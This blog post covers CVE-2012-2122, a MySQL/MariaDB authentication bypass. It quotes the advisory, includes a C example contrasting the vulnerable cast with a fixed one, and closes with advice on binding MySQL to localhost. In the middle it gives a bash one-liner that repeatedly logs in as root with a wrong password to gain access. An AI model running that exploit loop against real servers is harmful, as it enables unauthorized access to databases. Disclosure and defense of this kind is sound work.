Kip – Knowledge Is Power

Technology Rules, Knowledge Is Power, Power to the People,


CVE-2012-2122 : Serious Mysql Authentication Bypass Vulnerability


From:


A serious security bug in MariaDB and MySQL has been disclosed. According to the advisory, all MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. The issue has been assigned the ID CVE-2012-2122.

“When a user connects to MariaDB/MySQL, a token (SHA over a password and a random scramble string) is calculated and compared with the expected value. Because of incorrect casting, it might’ve happened that the token and the expected value were considered equal, even if the memcmp() returned a non-zero value. In this case MySQL/MariaDB would think that the password is correct, even while it is not. Because the protocol uses random strings, the probability of hitting this bug is about 1/256.”

“Which means, if one knows a user name to connect (and “root” almost always exists), she can connect using *any* password by repeating connection attempts. ~300 attempts takes only a fraction of second, so basically account password protection is as good as nonexistent. Any client will do, there’s no need for a special libmysqlclient library.”
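The narrowing cast described in the advisory, as an added example that is not MariaDB/MySQL source code and not part of the original post: it shows the vulnerable return pattern beside a hardened one and counts how often a mismatch is reported as a match. The type name `bool8` and all function names are hypothetical, and the comparison result is passed in as an `int` so the outcome does not depend on what a particular libc's memcmp() returns.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical one-byte boolean type (assumption: the advisory only says
   "incorrect casting"; what matters here is that it is narrower than int). */
typedef unsigned char bool8;

/* Vulnerable pattern: the int result of a comparison is narrowed to one byte.
   0 means "tokens match", so any non-zero multiple of 256 also reads as a match. */
static bool8 mismatch_vulnerable(int cmp_result)
{
    return (bool8)cmp_result;
}

/* Hardened pattern: reduce the result to 0/1 before it is narrowed. */
static bool8 mismatch_hardened(int cmp_result)
{
    return (bool8)(cmp_result != 0);
}

/* Count non-zero comparison results in [lo, hi] that a checker reports as "match". */
static int false_matches(bool8 (*check)(int), int lo, int hi)
{
    int n = 0;
    for (int v = lo; v <= hi; v++)
        if (v != 0 && check(v) == 0)
            n++;
    return n;
}

/* Token check built on the hardened pattern and the real memcmp(). */
static int token_accepted(const unsigned char *got, const unsigned char *want, size_t len)
{
    return mismatch_hardened(memcmp(got, want, len)) == 0;
}

int main(void)
{
    /* Constructed sample tokens, not real scramble data. */
    const unsigned char want[4] = {0x10, 0x20, 0x30, 0x40};
    const unsigned char got[4]  = {0x10, 0x20, 0x30, 0x41};

    printf("vulnerable false matches: %d of 65535\n",
           false_matches(mismatch_vulnerable, -32768, 32767));
    printf("hardened false matches:   %d of 65535\n",
           false_matches(mismatch_hardened, -32768, 32767));
    printf("wrong token accepted by hardened check: %d\n",
           token_accepted(got, want, sizeof want));
    return 0;
}
```

Over the 16-bit range of non-zero results the vulnerable form reports a match for 255 of 65535 values, in line with the advisory's "about 1/256".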

The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.

for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

mysql>

Defense: The first rule of securing MySQL is to not expose it to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, preventing remote access to the service. In cases where network access must be provided, MySQL also provides host-based access controls. There are few use cases where the MySQL daemon should be intentionally exposed to the wider network without any form of host-based access control.

The easiest thing to do is to modify the my.cnf file in order to restrict access to the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld] and change (or add a new line to set) the “bind-address” parameter to “127.0.0.1”. Restart the MySQL service to apply this setting.



  • Date 2012/06/11